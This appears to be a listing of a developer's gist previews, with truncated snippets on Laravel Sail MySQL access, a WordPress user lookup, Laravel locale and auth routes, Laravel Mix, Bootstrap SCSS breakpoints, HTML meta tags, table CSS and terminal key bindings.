Run this command in sail project folder:
docker-compose exec mysql bash
execute the mysql -u root -p
command
provide the default password password
then executes
Run this command in sail project folder:
docker-compose exec mysql bash
execute the mysql -u root -p
command
provide the default password password
then executes
<?php | |
require __DIR__ . '/wp-load.php'; | |
$username = 'admin'; | |
$user = get_user_by('login', $username ); | |
// Redirect URL // | |
if ( !is_wp_error( $user ) ) | |
{ |
https://janostlund.com/2018-06-21/laravel-locale | |
sudo apt-get install language-pack-es | |
{{ $post->published->formatLocalized('%e de %B') }} | |
https://www.php.net/manual/es/function.strftime.php |
Route::get('login', 'Auth\LoginController@showLoginForm')->name('login'); | |
Route::post('login', 'Auth\LoginController@login'); | |
Route::post('logout', 'Auth\LoginController@logout')->name('logout'); | |
Route::get('register', 'Auth\RegisterController@showRegistrationForm')->name('register'); | |
Route::post('register', 'Auth\RegisterController@register'); | |
Route::get('password/reset', 'Auth\ForgotPasswordController@showLinkRequestForm')->name('password.request'); | |
Route::post('password/email', 'Auth\ForgotPasswordController@sendResetLinkEmail')->name('password.email'); |
https://github.com/JeffreyWay/laravel-mix/blob/master/docs/installation.md#stand-alone-project | |
https://www.sitepoint.com/use-laravel-mix-non-laravel-projects/ | |
https://github.com/LasseRafn/sitepoint-laravel-mix-without-laravel |
// Default max limits widths | |
$container-max-widths: ( | |
sm: 540px, | |
md: 720px, | |
lg: 960px, | |
xl: 1280px | |
) !default; | |
======================= | |
======================= PUBLICAR SERVICIO | |
======================= | |
Inicio | |
> |
<!-- Desactivar la detección automática de números de teléfono --> | |
<meta name="format-detection" content="telephone=no"> | |
<!-- Desactivar la detección automática de emails --> | |
<meta name="format-detection" content="email=no"> | |
<!-- Desactivar la detección automática de direcciones postales --> | |
<meta name="format-detection" content="address=no"> |
<style type="text/css"> | |
.table-responsive table { | |
border-spacing: 0; | |
border-collapse: collapse; | |
} | |
.table-responsive td, .table-responsive th { | |
padding: 0; |
FOR ACTION SEND | |
⌘← "SEND HEX CODE" 0x01 | |
⌘→ "SEND HEX CODE" 0x05 | |
⌥← "SEND ESC SEQ" b | |
⌥→ "SEND ESC SEQ" f |